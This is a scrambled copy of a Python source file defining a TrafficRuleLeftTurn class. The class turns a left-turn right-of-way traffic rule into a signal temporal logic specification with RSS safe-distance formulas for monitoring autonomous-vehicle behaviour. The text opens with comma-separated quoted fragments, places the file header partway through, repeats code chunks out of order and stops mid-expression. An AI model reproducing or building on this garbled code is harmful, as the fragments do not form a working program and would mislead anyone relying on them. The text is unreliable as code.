approaching a junction in opposite directions: <<[...] They may only proceed", "= (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this", "This rule implement the Traffic Rule for two cars approaching a junction in", "** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den =", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()} # check", "d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def", "[\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in", "R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2", "def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals =", "d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop =", "= np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) ->", "car crosses junction, d(car,j)<0 and then release_condition is true (the ego can cross)", "\"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p", "numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement", "= data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] =", "<= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release", "used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\",", "data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] =", "obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data", "has the right of way. [...] Nor must a road user who is", "d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc)", "self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data:", "reaction time in number of steps (note: we use `next` operator, we need", "<= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" #", "signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) ->", "v_front = 0, because a junction is stationary # then, we just remove", "0) OR (car_can_brake) Note: this condition takes into account 2 possible implementation of", "\"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\",", "condition takes into account 2 possible implementation of the distance metric (only-positive or", "a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0)", "latter turns into the other road.>> Intuition behind formalization: premise = \"ego is", "= not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1", "and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and (next (not {S})))", "= f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str,", "signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"]", "have been rewritten to match the rtamt spec language (e.g. non-strict release) -", "def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr`", "required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property def spec(self): #", "reach zero-velocity or other car crossed the intersection\" Formalization in STL: premise =", "# note: the only change is the assumption that v_front = 0, because", "({obs_signals} not in {data.keys()})\" # generate output signals from input signals out_signals =", "list(v[begin:end]) for k, v in out_signals.items()} # check output assert all([s in out_signals", "s in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate output", "data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end])", "{A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S}", "right of way. [...] Nor must a road user who is obliged to", "f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str,", "# generate output signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"]", "of steps (note: we use `next` operator, we need discrete-time stl) `max_steps`: overestimation", "= data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] =", "= f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or", "implementation of the distance metric (only-positive or pos-neg) If pos-neg, when car crosses", "self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min =", "A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop}", "Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\",", "[\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\",", "= \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on", "d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr", "str) -> np.ndarray: # note: the only change is the assumption that v_front", "then release_condition is true (the ego can cross) If only-pos, when car crosses", "> d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react", "\"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params", "signals ({obs_signals} not in {data.keys()})\" # generate output signals from input signals out_signals", "({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str,", "= f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property", "to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"]", "who has the right of way when the latter turns into the other", "stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for", "-a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake)", "in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property def spec(self):", "from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 *", "Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\",", "<filename>stl_rules/tr_left_turn.py from typing import Dict, List import numpy as np from stl_rules.stl_rule import", "\"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing in signals", "AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake", "{data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] =", "a road user who is obliged to give way substantially impede a road", "crosses junction, d(car,j)<0 and then release_condition is true (the ego can cross) If", "we use `next` operator, we need discrete-time stl) `max_steps`: overestimation of the episode", "in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake", "f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and (next (not", "out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "in rss_params for p in required_parameters]) self._p = {p: rss_params[p] for p in", "v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()} # check output", "C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e", "until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn =", "P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" #", "= f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and (next", "cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is", "static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when", "{out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check", "been rewritten to match the rtamt spec language (e.g. non-strict release) - Def.", "return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\"", "or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next", "car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition)", "= d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff))", "def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def", "can see that they will neither endanger nor substantially impede a road user", "(next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej >", "begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\",", "* self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num", "self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den", "self._p = {p: rss_params[p] for p in required_parameters} @property def spec(self): # predicates", "distance metric (only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and", "data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"]", "* self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min", "may only proceed if they can see that they will neither endanger nor", "Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0)", "interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond =", "(is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v", "f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict", "on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\"", "the only change is the assumption that v_front = 0, because a junction", "is the assumption that v_front = 0, because a junction is stationary #", "junction, d(car,j)<0 and then release_condition is true (the ego can cross) If only-pos,", "discrete-time stl) `max_steps`: overestimation of the episode length, used to monitor open intervals", "in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake", "out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()}", "when the latter turns into the other road.>> Intuition behind formalization: premise =", "# the check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc =", "substantially impede a road user who has the right of way. [...] Nor", "v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in", "out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for", "no time to brake\" proper response = \"ego brakes until reach zero-velocity or", "> d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop", "= [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for", "breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in seconds", "@property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj", "__init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` :", "neither endanger nor substantially impede a road user who has the right of", "if they can see that they will neither endanger nor substantially impede a", "other car crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake)))", "is stationary # then, we just remove the `d_f_brake` term from the calculation", "[\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param", "operator is written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and", "using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\"", "= f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\"", "np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] =", "all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals} not in", "data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] =", "plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego)", "f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def", "car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators", "but not occupying the junction j, other car has no time to brake\"", "pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is true (the ego", "calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] *", "- data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"]", "OR (car_can_brake) Note: this condition takes into account 2 possible implementation of the", "all([s in out_signals for s in self.variables]), f\"missing out signals ({self.variables} not in", "v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} # check output", "2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] *", "_compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only change", "out_signals = {k: list(v) for k, v in out_signals.items()} # check output assert", "out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"]", "STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two cars", "case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e", "other road.>> Intuition behind formalization: premise = \"ego is approaching but not occupying", "out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals", "spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\"", "intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego,", "impede a road user who has the right of way when the latter", "dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego)", "`d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 /", "V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check", "/ self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] =", "release_condition is true (the ego can cross) If only-pos, when car crosses junction,", "= data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] =", "= data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"]", "pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is true", "** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff", "true (the ego can cross) If only-pos, when car crosses junction, d(car,j)=inf, then", "\"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for", "when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in", "and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake =", "np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic", "road user who is obliged to give way substantially impede a road user", "min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in", "f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn", "output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0]", "not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp =", "return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake", "can cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition", "turns into the other road.>> Intuition behind formalization: premise = \"ego is approaching", "@property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj", "# resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp", "d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return", "must a road user who is obliged to give way substantially impede a", "\"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\",", "# resulting specification phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next", "-> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\",", "occupying the junction j, other car has no time to brake\" proper response", "use `next` operator, we need discrete-time stl) `max_steps`: overestimation of the episode length,", "the other road.>> Intuition behind formalization: premise = \"ego is approaching but not", "rss_params for p in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters}", "until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp", "specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self,", "= phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\",", "not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake", "signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] -", "need discrete-time stl) `max_steps`: overestimation of the episode length, used to monitor open", "the junction j, other car has no time to brake\" proper response =", "or other car crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND", "list(v) for k, v in out_signals.items()} # check output assert all([s in out_signals", "specification # note: non-strict release operator is written using not and until S", "AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j)", "other car has no time to brake\" proper response = \"ego brakes until", "intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in", "0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes into", "brakes until reach zero-velocity or other car crossed the intersection\" Formalization in STL:", "\"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\"", "= data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\")", "# check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert", "acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time", "{p: rss_params[p] for p in required_parameters} @property def spec(self): # predicates E_canbrake =", "required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for", "np.ndarray: # note: the only change is the assumption that v_front = 0,", "user who has the right of way. [...] Nor must a road user", "parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking", "= [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p", "assert all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals} not", "/ 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho']", "out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"]", "return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: #", "data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"]", "j) <= 0) OR (car_can_brake) Note: this condition takes into account 2 possible", "longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction", "plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <=", "until reach zero-velocity or other car crossed the intersection\" Formalization in STL: premise", "= 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr +", "= data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] **", "E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake}", "in signals ({obs_signals} not in {data.keys()})\" # generate output signals from input signals", "If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is true (the", "or {C_react_or_crossed})\" # specification # note: non-strict release operator is written using not", "= \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or", "in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self,", "Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\",", ": min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal", "release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def.", "only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*:", "f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case d has pos-neg", "rss_params[p] for p in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej", "not occupying the junction j, other car has no time to brake\" proper", "the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc']", "Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only change is the", "Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def", "= \"ego is approaching but not occupying the junction j, other car has", "term from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2", "-> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej", "((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake", "k, v in out_signals.items()} # check output assert all([s in out_signals for s", "<= 0)\" C_react_or_crossed = f\"({C_canbrake} or 